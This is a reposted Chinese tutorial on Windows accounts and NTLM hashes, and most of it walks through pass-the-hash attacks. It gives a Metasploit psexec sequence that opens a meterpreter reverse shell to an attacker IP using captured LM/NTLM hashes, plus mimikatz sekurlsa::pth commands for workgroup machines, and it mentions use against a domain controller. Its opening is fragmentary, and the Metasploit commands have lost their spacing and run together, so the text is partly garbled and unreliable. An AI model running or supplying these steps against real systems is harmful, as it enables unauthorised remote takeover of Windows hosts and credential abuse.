windows中的用户和组以及用户密码破解
番茄系统家园 · 2021-08-18 02:00:25

密码换成HEX
HEX字符串进行转
字符串进行标准MD4单向哈希加密
-hex(16进制编码)--
在线NTLM加密的网站NTLM密码加密计算器
如图第三部分是LM-Hash第四部分是NTLM-Hash。目前的LM-hash是空值所以第四部分的NTLM-hash才是用户密码的哈希值。
哈希传递攻击(Pass-the-Hash,PtH)
有些时候当我们获取到了某台主机的用户的LM-Hash和NTLM-Hash并且该主机的445端口打开着。我们则可以利用 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash)这个利用跟工作组环境或者域环境无关。
msfuseexploit/windows/smb/psexecmsfexploit(psexec)setpayloadwindows/meterpreter/reverse_tcpmsfexploit(psexec)setlhost192.168.10.27msfexploit(psexec)setrhost192.168.10.14msfexploit(psexec)setsmbuserAdministratormsfexploit(psexec)setsmbpass815A3D91F923441FAAD3B435B51404EE:A86D277D2BCD8C8184B01AC21B6985F6#这里LM和NTLM我们已经获取到了msfexploit(psexec)exploit
mimikatz进行哈希传递攻击PtH(工作组)
当我们获得了一台主机的NTLM哈希值我们可以使用mimikatz对其进行哈希传递攻击。执行完命令后会弹出cmd窗口。
#使用administrator用户的NTLM哈希值进行攻击sekurlsa::pth/user:administrator/domain:192.168.10.15/ntlm:329153f560eb329c0e1deea55e88a1e9#使用xie用户的NTLM哈希值进行攻击sekurlsa::pth/user:xie/domain:192.168.10.15/ntlm:329153f560eb329c0e1deea55e88a1e9
在弹出的cmd窗口我们直接可以连接该主机并且查看该主机下的文件夹。
或者可以直接将该主机的C盘映射到本地的K盘。
非administrator用户权限不够
注只能在mimikatz弹出的cmd窗口才可以执行这些操作
mimikatz进行哈希传递攻击PtH(域)
在域环境中当我们获得了域内用户的NTLM哈希值我们可以使用域内的一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后会弹出cmd窗口。前提是我们必须拥有域内任意一台主机的本地 administrator 权限和获得了域用户的NTLM哈希值
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/post/37789.html。
